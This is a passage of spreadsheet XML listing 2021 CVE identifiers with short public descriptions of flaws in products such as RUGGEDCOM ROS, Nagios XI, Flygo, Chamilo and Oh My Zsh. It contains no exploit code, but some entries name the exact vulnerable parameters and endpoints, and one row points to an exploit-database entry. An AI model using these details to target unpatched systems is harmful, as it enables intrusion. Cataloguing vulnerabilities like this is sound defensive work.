    <t>A vulnerability has been identified in RUGGEDCOM ROS M2100 (All versions), RUGGEDCOM ROS M2200 (All versions), RUGGEDCOM ROS M969 (All versions), RUGGEDCOM ROS RMC (All versions), RUGGEDCOM ROS RMC20 (All versions), RUGGEDCOM ROS RMC30 (All versions), RUGGEDCOM ROS RMC40 (All versions), RUGGEDCOM ROS RMC41 (All versions), RUGGEDCOM ROS RMC8388 (All versions &lt; V5.6.0), RUGGEDCOM ROS RP110 (All versions), RUGGEDCOM ROS RS400 (All versions), RUGGEDCOM ROS RS401 (All versions), RUGGEDCOM ROS RS416 (All versions), RUGGEDCOM ROS RS416v2 (All versions &lt; V5.6.0), RUGGEDCOM ROS RS8000 (All versions), RUGGEDCOM ROS RS8000A (All versions), RUGGEDCOM ROS RS8000H (All versions), RUGGEDCOM ROS RS8000T (All versions), RUGGEDCOM ROS RS900 (32M) (All versions &lt; V5.6.0), RUGGEDCOM ROS RS900G (All versions), RUGGEDCOM ROS RS900G (32M) (All versions &lt; V5.6.0), RUGGEDCOM ROS RS900GP (All versions), RUGGEDCOM ROS RS900L (All versions), RUGGEDCOM ROS RS900W (All versions), RUGGEDCOM ROS RS910 (All versions), RUGGEDCOM ROS RS910L (All versions), RUGGEDCOM ROS RS910W (All versions), RUGGEDCOM ROS RS920L (All versions), RUGGEDCOM ROS RS920W (All versions), RUGGEDCOM ROS RS930L (All versions), RUGGEDCOM ROS RS930W (All versions), RUGGEDCOM ROS RS940G (All versions), RUGGEDCOM ROS RS969 (All versions), RUGGEDCOM ROS RSG2100 (All versions), RUGGEDCOM ROS RSG2100 (32M) (All versions &lt; V5.6.0), RUGGEDCOM ROS RSG2100P (All versions), RUGGEDCOM ROS RSG2200 (All versions), RUGGEDCOM ROS RSG2288 (All versions &lt; V5.6.0), RUGGEDCOM ROS RSG2300 (All versions &lt; V5.6.0), RUGGEDCOM ROS RSG2300P (All versions &lt; V5.6.0), RUGGEDCOM ROS RSG2488 (All versions &lt; V5.6.0), RUGGEDCOM ROS RSG907R (All versions &lt; V5.6.0), RUGGEDCOM ROS RSG908C (All versions &lt; V5.6.0), RUGGEDCOM ROS RSG909R (All versions &lt; V5.6.0), RUGGEDCOM ROS RSG910C (All versions &lt; V5.6.0), RUGGEDCOM ROS RSG920P (All versions &lt; V5.6.0), RUGGEDCOM ROS RSL910 (All versions &lt; V5.6.0), RUGGEDCOM ROS RST2228 (All versions &lt; V5.6.0), RUGGEDCOM ROS RST2228P (All versions &lt; V5.6.0), RUGGEDCOM ROS RST916C (All versions &lt; V5.6.0), RUGGEDCOM ROS RST916P (All versions &lt; V5.6.0), RUGGEDCOM ROS i800 (All versions), RUGGEDCOM ROS i801 (All versions), RUGGEDCOM ROS i802 (All versions), RUGGEDCOM ROS i803 (All versions). Improper neutralization of special characters on the web server configuration page could allow an attacker, in a privileged position, to retrieve sensitive information via cross-site scripting.</t>
  </si>
  <si>
    <t>CVE-2021-37209</t>
  </si>
  <si>
    <t>A vulnerability has been identified in RUGGEDCOM ROS M2100, RUGGEDCOM ROS M2200, RUGGEDCOM ROS M969, RUGGEDCOM ROS RMC, RUGGEDCOM ROS RMC20, RUGGEDCOM ROS RMC30, RUGGEDCOM ROS RMC30 V4.X, RUGGEDCOM ROS RMC40, RUGGEDCOM ROS RMC41, RUGGEDCOM ROS RMC8388, RUGGEDCOM ROS RMC8388 V4.X, RUGGEDCOM ROS RMC8388 V5.X, RUGGEDCOM ROS RP110, RUGGEDCOM ROS RP110 V4.X, RUGGEDCOM ROS RS1600 V4.X, RUGGEDCOM ROS RS1600F V4.X, RUGGEDCOM ROS RS1600T V4.X, RUGGEDCOM ROS RS400, RUGGEDCOM ROS RS400 V4.X, RUGGEDCOM ROS RS401, RUGGEDCOM ROS RS401 V4.X, RUGGEDCOM ROS RS416, RUGGEDCOM ROS RS416Pv2 V4.X, RUGGEDCOM ROS RS416Pv2 V5.X, RUGGEDCOM ROS RS416v2, RUGGEDCOM ROS RS416v2 V4.X, RUGGEDCOM ROS RS416v2 V5.X, RUGGEDCOM ROS RS8000, RUGGEDCOM ROS RS8000 V4.X, RUGGEDCOM ROS RS8000A, RUGGEDCOM ROS RS8000A V4.X, RUGGEDCOM ROS RS8000H, RUGGEDCOM ROS RS8000H V4.X, RUGGEDCOM ROS RS8000T, RUGGEDCOM ROS RS8000T V4.X, RUGGEDCOM ROS RS900 (32M), RUGGEDCOM ROS RS900 (32M) V4.X, RUGGEDCOM ROS RS900 (32M) V5.X, RUGGEDCOM ROS RS900 V4.X, RUGGEDCOM ROS RS900G, RUGGEDCOM ROS RS900G (32M), RUGGEDCOM ROS RS900G (32M) V4.X, RUGGEDCOM ROS RS900G (32M) V5.X, RUGGEDCOM ROS RS900G V4.X, RUGGEDCOM ROS RS900GP, RUGGEDCOM ROS RS900GP V4.X, RUGGEDCOM ROS RS900L, RUGGEDCOM ROS RS900L V4.X, RUGGEDCOM ROS RS900M V4.X, RUGGEDCOM ROS RS900W, RUGGEDCOM ROS RS900W V4.X, RUGGEDCOM ROS RS910, RUGGEDCOM ROS RS910 V4.X, RUGGEDCOM ROS RS910L, RUGGEDCOM ROS RS910L V4.X, RUGGEDCOM ROS RS910W, RUGGEDCOM ROS RS910W V4.X, RUGGEDCOM ROS RS920L, RUGGEDCOM ROS RS920L V4.X, RUGGEDCOM ROS RS920W, RUGGEDCOM ROS RS920W V4.X, RUGGEDCOM ROS RS930L, RUGGEDCOM ROS RS930L V4.X, RUGGEDCOM ROS RS930W, RUGGEDCOM ROS RS930W V4.X, RUGGEDCOM ROS RS940G, RUGGEDCOM ROS RS940G V4.X, RUGGEDCOM ROS RS969, RUGGEDCOM ROS RSG2100, RUGGEDCOM ROS RSG2100 (32M), RUGGEDCOM ROS RSG2100 (32M) V4.X, RUGGEDCOM ROS RSG2100 (32M) V5.X, RUGGEDCOM ROS RSG2100 V4.X, RUGGEDCOM ROS RSG2100P, RUGGEDCOM ROS RSG2100P V4.X, RUGGEDCOM ROS RSG2200, RUGGEDCOM ROS RSG2200 V4.X, RUGGEDCOM ROS RSG2288, RUGGEDCOM ROS RSG2288 V4.X, RUGGEDCOM ROS RSG2288 V5.X, RUGGEDCOM ROS RSG2300, RUGGEDCOM ROS RSG2300 V4.X, RUGGEDCOM ROS RSG2300 V5.X, RUGGEDCOM ROS RSG2300P, RUGGEDCOM ROS RSG2300P V4.X, RUGGEDCOM ROS RSG2300P V5.X, RUGGEDCOM ROS RSG2488, RUGGEDCOM ROS RSG2488 V4.X, RUGGEDCOM ROS RSG2488 V5.X, RUGGEDCOM ROS RSG907R, RUGGEDCOM ROS RSG907R V5.X, RUGGEDCOM ROS RSG908C, RUGGEDCOM ROS RSG908C V5.X, RUGGEDCOM ROS RSG909R, RUGGEDCOM ROS RSG909R V5.X, RUGGEDCOM ROS RSG910C, RUGGEDCOM ROS RSG910C V5.X, RUGGEDCOM ROS RSG920P, RUGGEDCOM ROS RSG920P V4.X, RUGGEDCOM ROS RSG920P V5.X, RUGGEDCOM ROS RSL910, RUGGEDCOM ROS RSL910 V5.X, RUGGEDCOM ROS RST2228, RUGGEDCOM ROS RST2228 V5.X, RUGGEDCOM ROS RST2228P, RUGGEDCOM ROS RST2228P V5.X, RUGGEDCOM ROS RST916C, RUGGEDCOM ROS RST916C V5.X, RUGGEDCOM ROS RST916P, RUGGEDCOM ROS RST916P V5.X, RUGGEDCOM ROS i800, RUGGEDCOM ROS i800 V4.X, RUGGEDCOM ROS i801, RUGGEDCOM ROS i801 V4.X, RUGGEDCOM ROS i802, RUGGEDCOM ROS i802 V4.X, RUGGEDCOM ROS i803, RUGGEDCOM ROS i803 V4.X. The SSH server on affected devices is configured to offer weak ciphers by default. This could allow an unauthorized attacker in a man-in-the-middle position to read and modify any data passed over the connection between legitimate clients and the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-3721</t>
  </si>
  <si>
    <t>A denial of service vulnerability was reported in Lenovo PCManager prior to version 4.0.20.10282 that could allow an attacker with local access to trigger a blue screen error.</t>
  </si>
  <si>
    <t>CVE-2021-37211</t>
  </si>
  <si>
    <t>The bulletin function of Flygo does not filter special characters while a new announcement is added. Remoter attackers can use the vulnerability with general user’s credential to inject JavaScript and execute stored XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2021-37212</t>
  </si>
  <si>
    <t>The bulletin function of Flygo contains Insecure Direct Object Reference (IDOR) vulnerability. After being authenticated as a general user, remote attackers can manipulate the bulletin ID in specific Url parameters and access and modify bulletin particular content.</t>
  </si>
  <si>
    <t>CVE-2021-37213</t>
  </si>
  <si>
    <t>The check-in record page of Flygo contains Insecure Direct Object Reference (IDOR) vulnerability. After being authenticated as a general user, remote attackers can manipulate the employee ID and date in specific parameters to access particular employee’s check-in record.</t>
  </si>
  <si>
    <t>CVE-2021-37214</t>
  </si>
  <si>
    <t>The employee management page of Flygo contains Insecure Direct Object Reference (IDOR) vulnerability. After being authenticated as a general user, remote attackers can manipulate the employee ID in specific parameters to arbitrary access employee's data, modify it, and then obtain administrator privilege and execute arbitrary command.</t>
  </si>
  <si>
    <t>CVE-2021-37215</t>
  </si>
  <si>
    <t>The employee management page of Flygo contains an Insecure Direct Object Reference (IDOR) vulnerability. After being authenticated as a general user, remote attacker can manipulate the user data and then over-write another employee’s user data by specifying that employee’s ID in the API parameter.</t>
  </si>
  <si>
    <t>CVE-2021-37216</t>
  </si>
  <si>
    <t>QSAN Storage Manager header page parameters does not filter special characters. Remote attackers can inject JavaScript without logging in and launch reflected XSS attacks to access and modify specific data.</t>
  </si>
  <si>
    <t>CVE-2021-37218</t>
  </si>
  <si>
    <t>HashiCorp Nomad and Nomad Enterprise Raft RPC layer allows non-server agents with a valid certificate signed by the same CA to access server-only functionality, enabling privilege escalation. Fixed in 1.0.10 and 1.1.4.</t>
  </si>
  <si>
    <t>CVE-2021-37219</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise 1.10.1 Raft RPC layer allows non-server agents with a valid certificate signed by the same CA to access server-only functionality, enabling privilege escalation. Fixed in 1.8.15, 1.9.9 and 1.10.2.</t>
  </si>
  <si>
    <t>CVE-2021-3722</t>
  </si>
  <si>
    <t>A denial of service vulnerability was reported in Lenovo PCManager prior to version 4.0.40.2175 that could allow configuration files to be written to non-standard locations during installation.</t>
  </si>
  <si>
    <t>CVE-2021-37220</t>
  </si>
  <si>
    <t>MuPDF through 1.18.1 has an out-of-bounds write because the cached color converter does not properly consider the maximum key size of a hash table. This can, for example, be seen with crafted "mutool draw" input.</t>
  </si>
  <si>
    <t>CVE-2021-37221</t>
  </si>
  <si>
    <t>A file upload vulnerability exists in Sourcecodester Customer Relationship Management System 1.0 via the account update option &amp; customer create option, which could let a remote malicious user upload an arbitrary php file. .</t>
  </si>
  <si>
    <t>CVE-2021-37222</t>
  </si>
  <si>
    <t>Parsers in the open source project RCDCAP before 1.0.5 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via specially crafted packets.</t>
  </si>
  <si>
    <t>CVE-2021-37223</t>
  </si>
  <si>
    <t>Nagios Enterprises NagiosXI &lt;= 5.8.4 contains a Server-Side Request Forgery (SSRF) vulnerability in schedulereport.php. Any authenticated user can create scheduled reports containing PDF screenshots of any view in the NagiosXI application. Due to lack of input sanitisation, the target page can be replaced with an SSRF payload to access internal resources or disclose local system files.</t>
  </si>
  <si>
    <t>CVE-2021-3723</t>
  </si>
  <si>
    <t>A command injection vulnerability was reported in the Integrated Management Module (IMM) of legacy IBM System x 3550 M3 and IBM System x 3650 M3 servers that could allow the execution of operating system commands over an authenticated SSH or Telnet session.</t>
  </si>
  <si>
    <t>CVE-2021-37231</t>
  </si>
  <si>
    <t>A stack-buffer-overflow occurs in Atomicparsley 20210124.204813.840499f through APar_readX() in src/util.cpp while parsing a crafted mp4 file because of the missing boundary check.</t>
  </si>
  <si>
    <t>CVE-2021-37232</t>
  </si>
  <si>
    <t>A stack overflow vulnerability occurs in Atomicparsley 20210124.204813.840499f through APar_read64() in src/util.cpp due to the lack of buffer size of uint32_buffer while reading more bytes in APar_read64.</t>
  </si>
  <si>
    <t>CVE-2021-3725</t>
  </si>
  <si>
    <t>Vulnerability in dirhistory plugin Description: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection. Impacted areas: - Functions pop_past and pop_future in dirhistory plugin.</t>
  </si>
  <si>
    <t>CVE-2021-37253</t>
  </si>
  <si>
    <t>** DISPUTED ** M-Files Web before 20.10.9524.1 allows a denial of service via overlapping ranges (in HTTP requests with crafted Range or Request-Range headers). NOTE: this is disputed because the range behavior is the responsibility of the web server, not the responsibility of the individual web application.</t>
  </si>
  <si>
    <t>CVE-2021-37254</t>
  </si>
  <si>
    <t>In M-Files Web product with versions before 20.10.9524.1 and 20.10.9445.0, a remote attacker could use a flaw to obtain unauthenticated access to 3rd party component license key information on server.</t>
  </si>
  <si>
    <t>CVE-2021-3726</t>
  </si>
  <si>
    <t># Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function.</t>
  </si>
  <si>
    <t>CVE-2021-37262</t>
  </si>
  <si>
    <t>JFinal_cms 5.1.0 is vulnerable to regex injection that may lead to Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-37267</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in all versions of KindEditor, which can be exploited by an attacker to obtain user cookie information.</t>
  </si>
  <si>
    <t>CVE-2021-3727</t>
  </si>
  <si>
    <t># Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they're an external API, it's not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function).</t>
  </si>
  <si>
    <t>CVE-2021-37270</t>
  </si>
  <si>
    <t>There is an unauthorized access vulnerability in the CMS Enterprise Website Construction System 5.0. Attackers can use this vulnerability to directly access the specified background path without logging in to the background to obtain the background administrator authority.</t>
  </si>
  <si>
    <t>CVE-2021-37271</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in UEditor v1.4.3.3, which can be exploited by an attacker to obtain user cookie information.</t>
  </si>
  <si>
    <t>CVE-2021-37273</t>
  </si>
  <si>
    <t>A Denial of Service issue exists in China Telecom Corporation EPON Tianyi Gateway ZXHN F450(EPON ONU) 3.0. Tianyi Gateway is a hardware terminal of "Optical Modem Smart Router." Attackers can use this vulnerability to restart the device multiple times.</t>
  </si>
  <si>
    <t>CVE-2021-37274</t>
  </si>
  <si>
    <t>Kingdee KIS Professional Edition has a privilege escalation vulnerability. Attackers can use the vulnerability to gain computer administrator rights via unspecified loopholes.</t>
  </si>
  <si>
    <t>CVE-2021-3728</t>
  </si>
  <si>
    <t>firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>CVE-2021-37289</t>
  </si>
  <si>
    <t>Insecure Permissions in administration interface in Planex MZK-DP150N 1.42 and 1.43 allows attackers to execute system command as root via etc_ro/web/syscmd.asp.</t>
  </si>
  <si>
    <t>CVE-2021-3729</t>
  </si>
  <si>
    <t>CVE-2021-37291</t>
  </si>
  <si>
    <t>An SQL Injection vulnerability exists in KevinLAB Inc Building Energy Management System 4ST BEMS 1.0.0 ivia the input_id POST parameter in index.php.</t>
  </si>
  <si>
    <t>CVE-2021-37292</t>
  </si>
  <si>
    <t>An Access Control vulnerability exists in KevinLAB Inc Building Energy Management System 4ST BEMS 1.0.0 due to an undocumented backdoor account. A malicious user can log in using the backdor account with admin highest privileges and obtain system control.</t>
  </si>
  <si>
    <t>CVE-2021-37293</t>
  </si>
  <si>
    <t>A Directory Traversal vulnerability exists in KevinLAB Inc Building Energy Management System 4ST BEMS 1.0.0 via the page GET parameter in index.php.</t>
  </si>
  <si>
    <t>CVE-2021-3730</t>
  </si>
  <si>
    <t>CVE-2021-3731</t>
  </si>
  <si>
    <t>LedgerSMB does not sufficiently guard against being wrapped by other sites, making it vulnerable to 'clickjacking'. This allows an attacker to trick a targetted user to execute unintended actions.</t>
  </si>
  <si>
    <t>CVE-2021-3732</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel's OverlayFS subsystem in the way the user mounts the TmpFS filesystem with OverlayFS. This flaw allows a local user to gain access to hidden files that should not be accessible.</t>
  </si>
  <si>
    <t>CVE-2021-37322</t>
  </si>
  <si>
    <t>GCC c++filt v2.26 was discovered to contain a use-after-free vulnerability via the component cplus-dem.c.</t>
  </si>
  <si>
    <t>CVE-2021-37326</t>
  </si>
  <si>
    <t>NetSarang Xshell 7 before Build 0077 includes unintended code strings in paste operations.</t>
  </si>
  <si>
    <t>CVE-2021-3733</t>
  </si>
  <si>
    <t>There's a flaw in urllib's AbstractBasicAuthHandler class. An attacker who controls a malicious HTTP server that an HTTP client (such as web browser) connects to, could trigger a Regular Expression Denial of Service (ReDOS) during an authentication request with a specially crafted payload that is sent by the server to the client. The greatest threat that this flaw poses is to application availability.</t>
  </si>
  <si>
    <t>CVE-2021-37330</t>
  </si>
  <si>
    <t>Laravel Booking System Booking Core 2.0 is vulnerable to Cross Site Scripting (XSS). The Avatar upload in the My Profile section could be exploited to upload a malicious SVG file which contains Javascript. Now if another user/admin views the profile and clicks to view his avatar, an XSS will trigger.</t>
  </si>
  <si>
    <t>CVE-2021-37331</t>
  </si>
  <si>
    <t>Laravel Booking System Booking Core 2.0 is vulnerable to Incorrect Access Control. On the Verifications page, after uploading an ID Card or Trade License and viewing it, ID Cards and Trade Licenses of other vendors/users can be viewed by changing the URL.</t>
  </si>
  <si>
    <t>CVE-2021-37333</t>
  </si>
  <si>
    <t>Laravel Booking System Booking Core 2.0 is vulnerable to Session Management. A password change at sandbox.bookingcore.org/user/profile/change-password does not invalidate a session that is opened in a different browser.</t>
  </si>
  <si>
    <t>CVE-2021-37334</t>
  </si>
  <si>
    <t>Umbraco Forms version 4.0.0 up to and including 8.7.5 and below are vulnerable to a security flaw that could lead to a remote code execution attack and/or arbitrary file deletion. A vulnerability occurs because validation of the file extension is performed after the file has been stored in a temporary directory. By default, files are stored within the application directory structure at %BASEDIR%/APP_DATA/TEMP/FileUploads/. Whilst access to this directory is restricted by the root web.config file, it is possible to override this restriction by uploading another specially crafted web.config file to the temporary directory. It is possible to exploit this flaw to upload a malicious script file to execute arbitrary code and system commands on the server.</t>
  </si>
  <si>
    <t>CVE-2021-3734</t>
  </si>
  <si>
    <t>yourls is vulnerable to Improper Restriction of Rendered UI Layers or Frames</t>
  </si>
  <si>
    <t>CVE-2021-37343</t>
  </si>
  <si>
    <t>A path traversal vulnerability exists in Nagios XI below version 5.8.5 AutoDiscovery component and could lead to post authenticated RCE under security context of the user running Nagios.</t>
  </si>
  <si>
    <t>CVE-2021-37344</t>
  </si>
  <si>
    <t>Nagios XI Switch Wizard before version 2.5.7 is vulnerable to remote code execution through improper neutralisation of special elements used in an OS Command (OS Command injection).</t>
  </si>
  <si>
    <t>CVE-2021-37345</t>
  </si>
  <si>
    <t>Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because xi-sys.cfg is being imported from the var directory for some scripts with elevated permissions.</t>
  </si>
  <si>
    <t>CVE-2021-37346</t>
  </si>
  <si>
    <t>Nagios XI WatchGuard Wizard before version 1.4.8 is vulnerable to remote code execution through Improper neutralisation of special elements used in an OS Command (OS Command injection).</t>
  </si>
  <si>
    <t>CVE-2021-37347</t>
  </si>
  <si>
    <t>Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because getprofile.sh does not validate the directory name it receives as an argument.</t>
  </si>
  <si>
    <t>CVE-2021-37348</t>
  </si>
  <si>
    <t>Nagios XI before version 5.8.5 is vulnerable to local file inclusion through improper limitation of a pathname in index.php.</t>
  </si>
  <si>
    <t>CVE-2021-37349</t>
  </si>
  <si>
    <t>Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because cleaner.php does not sanitise input read from the database.</t>
  </si>
  <si>
    <t>CVE-2021-3735</t>
  </si>
  <si>
    <t>A deadlock issue was found in the AHCI controller device of QEMU. It occurs on a software reset (ahci_reset_port) while handling a host-to-device Register FIS (Frame Information Structure) packet from the guest. A privileged user inside the guest could use this flaw to hang the QEMU process on the host, resulting in a denial of service condition. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-37350</t>
  </si>
  <si>
    <t>Nagios XI before version 5.8.5 is vulnerable to SQL injection vulnerability in Bulk Modifications Tool due to improper input sanitisation.</t>
  </si>
  <si>
    <t>CVE-2021-37351</t>
  </si>
  <si>
    <t>Nagios XI before version 5.8.5 is vulnerable to insecure permissions and allows unauthenticated users to access guarded pages through a crafted HTTP request to the server.</t>
  </si>
  <si>
    <t>CVE-2021-37352</t>
  </si>
  <si>
    <t>An open redirect vulnerability exists in Nagios XI before version 5.8.5 that could lead to spoofing. To exploit the vulnerability, an attacker could send a link that has a specially crafted URL and convince the user to click the link.</t>
  </si>
  <si>
    <t>CVE-2021-37353</t>
  </si>
  <si>
    <t>Nagios XI Docker Wizard before version 1.1.3 is vulnerable to SSRF due to improper sanitation in table_population.php.</t>
  </si>
  <si>
    <t>CVE-2021-37354</t>
  </si>
  <si>
    <t>Xerox Phaser 4622 v35.013.01.000 was discovered to contain a buffer overflow in the function sub_3226AC via the TIMEZONE variable. This vulnerability allows attackers to cause a Denial of Service (DoS) via crafted overflow data.</t>
  </si>
  <si>
    <t>CVE-2021-37358</t>
  </si>
  <si>
    <t>SQL Injection in SEACMS v210530 (2021-05-30) allows remote attackers to execute arbitrary code via the component "admin_ajax.php?action=checkrepeat&amp;v_name=".</t>
  </si>
  <si>
    <t>CVE-2021-3736</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel. A memory leak problem was found in mbochs_ioctl in samples/vfio-mdev/mbochs.c in Virtual Function I/O (VFIO) Mediated devices. This flaw could allow a local attacker to leak internal kernel information.</t>
  </si>
  <si>
    <t>CVE-2021-37363</t>
  </si>
  <si>
    <t>An Insecure Permissions issue exists in Gestionale Open 11.00.00. A low privilege account is able to rename the mysqld.exe file located in bin folder and replace with a malicious file that would connect back to an attacking computer giving system level privileges (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service through the application, a restart of the computer triggers the execution of the malicious file. The application also have unquoted service path issues.</t>
  </si>
  <si>
    <t>CVE-2021-37364</t>
  </si>
  <si>
    <t>OpenClinic GA 5.194.18 is affected by Insecure Permissions. By default the Authenticated Users group has the modify permission to openclinic folders/files. A low privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace with a malicious file that would connect back to an attacking computer giving system level privileges (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service through the application, a restart of the computer triggers the execution of the malicious file. The application also have unquoted service path issues.</t>
  </si>
  <si>
    <t>CVE-2021-37365</t>
  </si>
  <si>
    <t>CTparental before 4.45.03 is vulnerable to cross-site scripting (XSS) in the CTparental admin panel. In bl_categires_help.php, the 'categories' variable is assigned with the content of the query string param 'cat' without sanitization or encoding, enabling an attacker to inject malicious code into the output webpage.</t>
  </si>
  <si>
    <t>CVE-2021-37366</t>
  </si>
  <si>
    <t>CTparental before 4.45.03 is vulnerable to cross-site request forgery (CSRF) in the CTparental admin panel. By combining CSRF with XSS, an attacker can trick the administrator into clicking a link that cancels the filtering for all standard users.</t>
  </si>
  <si>
    <t>CVE-2021-37367</t>
  </si>
  <si>
    <t>CTparental before 4.45.07 is affected by a code execution vulnerability in the CTparental admin panel. Because The file "bl_categories_help.php" is vulnerable to directory traversal, an attacker can create a file that contains scripts and run arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2021-3737</t>
  </si>
  <si>
    <t>A flaw was found in python. An improperly handled HTTP response in the HTTP client code of python may allow a remote attacker, who controls the HTTP server, to make the client script enter an infinite loop, consuming CPU time. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-37371</t>
  </si>
  <si>
    <t>Online Student Admission System 1.0 is affected by an unauthenticated SQL injection bypass vulnerability in /admin/login.php.</t>
  </si>
  <si>
    <t>CVE-2021-37372</t>
  </si>
  <si>
    <t>Online Student Admission System 1.0 is affected by an insecure file upload vulnerability. A low privileged user can upload malicious PHP files by updating their profile image to gain remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-3738</t>
  </si>
  <si>
    <t>In DCE/RPC it is possible to share the handles (cookies for resource state) between multiple connections via a mechanism called 'association groups'. These handles can reference connections to our sam.ldb database. However while the database was correctly shared, the user credentials state was only pointed at, and when one connection within that association group ended, the database would be left pointing at an invalid 'struct session_info'. The most likely outcome here is a crash, but it is possible that the use-after-free could instead allow different user state to be pointed at and this might allow more privileged access.</t>
  </si>
  <si>
    <t>CVE-2021-37381</t>
  </si>
  <si>
    <t>Southsoft GMIS 5.0 is vulnerable to CSRF attacks. Attackers can access other users' private information such as photos through CSRF. For example: any student's photo information can be accessed through /gmis/(S([1]))/student/grgl/PotoImageShow/?bh=[2]. Among them, the code in [1] is a random string generated according to the user's login related information. It can protect the user's identity, but it can not effectively prevent unauthorized access. The code in [2] is the student number of any student. The attacker can carry out CSRF attack on the system by modifying [2] without modifying [1].</t>
  </si>
  <si>
    <t>CVE-2021-37388</t>
  </si>
  <si>
    <t>A buffer overflow in D-Link DIR-615 C2 3.03WW. The ping_ipaddr parameter in ping_response.cgi POST request allows an attacker to crash the webserver and might even gain remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-37389</t>
  </si>
  <si>
    <t>Chamilo 1.11.14 allows stored XSS via main/install/index.php and main/install/ajax.php through the port parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3739</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw was found in the btrfs_rm_device function in fs/btrfs/volumes.c in the Linux Kernel, where triggering the bug requires ‘CAP_SYS_ADMIN’. This flaw allows a local attacker to crash the system or leak kernel internal information. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50694.txt</t>
  </si>
  <si>
    <t>Chamilo LMS 1.11.14 - Account Takeover</t>
  </si>
  <si>
    <t>CVE-2021-37390</t>
  </si>
  <si>
    <t>A Chamilo LMS 1.11.14 reflected XSS vulnerability exists in main/social/search.php=q URI (social network search feature).</t>
  </si>
  <si>
    <t>CVE-2021-37391</t>
  </si>
  <si>
    <t>A user without privileges in Chamilo LMS 1.11.14 can send an invitation message to another user, e.g., the administrator, through main/social/search.php, main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on the administration side via a stored XSS vulnerability via social network the send invitation feature.</t>
  </si>
  <si>
    <t>CVE-2021-37392</t>
  </si>
  <si>
    <t>In RPCMS v1.8 and below, the "nickname" variable is not properly sanitized before being displayed on page. When the API functions are enabled, the attacker can use API to update user nickname with XSS payload and achieve stored XSS. Users who view the articles published by the injected user will trigger the XSS.</t>
  </si>
  <si>
    <t>CVE-2021-37393</t>
  </si>
  <si>
    <t>In RPCMS v1.8 and below, the "nickname" variable is not properly sanitized before being displayed on page. Attacker can use "update password" function to inject XSS payloads into nickname variable, and achieve stored XSS. Users who view the articles published by the injected user will trigger the XSS.</t>
  </si>
  <si>
    <t>CVE-2021-37394</t>
  </si>
  <si>
    <t>In RPCMS v1.8 and below, attackers can interact with API and change variable "role" to "admin" to achieve admin user registration.</t>
  </si>
  <si>
    <t>CVE-2021-37400</t>
  </si>
  <si>
    <t>An attacker may obtain the user credentials from the communication between the PLC and the software. As a result, the PLC user program may be uploaded, altered, and/or downloaded.</t>
  </si>
  <si>
    <t>CVE-2021-37401</t>
  </si>
  <si>
    <t>An attacker may obtain the user credentials from file servers, backup repositories, or ZLD files saved in SD cards. As a result, the PLC user program may be uploaded, altered, and/or downloaded.</t>
  </si>
  <si>
    <t>CVE-2021-37402</t>
  </si>
  <si>
    <t>OX App Suite before 7.10.3-rev32 and 7.10.4 before 7.10.4-rev18 allows XSS via binary data that is mishandled when the legacy dataretrieval endpoint has been enabled.</t>
  </si>
  <si>
    <t>CVE-2021-37403</t>
  </si>
  <si>
    <t>OX App Suite before 7.10.3-rev32 and 7.10.4 before 7.10.4-rev18 allows XSS via a code snippet (user-generated content) when a sharing link is created and an App Loader relative URL is used.</t>
  </si>
  <si>
    <t>CVE-2021-37404</t>
  </si>
  <si>
    <t>There is a potential heap buffer overflow in Apache Hadoop libhdfs native code. Opening a file path provided by user without validation may result in a denial of service or arbitrary code execution. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.</t>
  </si>
  <si>
    <t>CVE-2021-37409</t>
  </si>
  <si>
    <t>Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-37412</t>
  </si>
  <si>
    <t>The TechRadar app 1.1 for Confluence Server allows XSS via the Title field of a Radar.</t>
  </si>
  <si>
    <t>CVE-2021-37413</t>
  </si>
  <si>
    <t>GRANDCOM DynWEB before 4.2 contains a SQL Injection vulnerability in the admin login interface. A remote unauthenticated attacker can exploit this vulnerability to obtain administrative access to the webpage, access the user database, modify web content and upload custom files. The backend login script does not verify and sanitize user-provided strings.</t>
  </si>
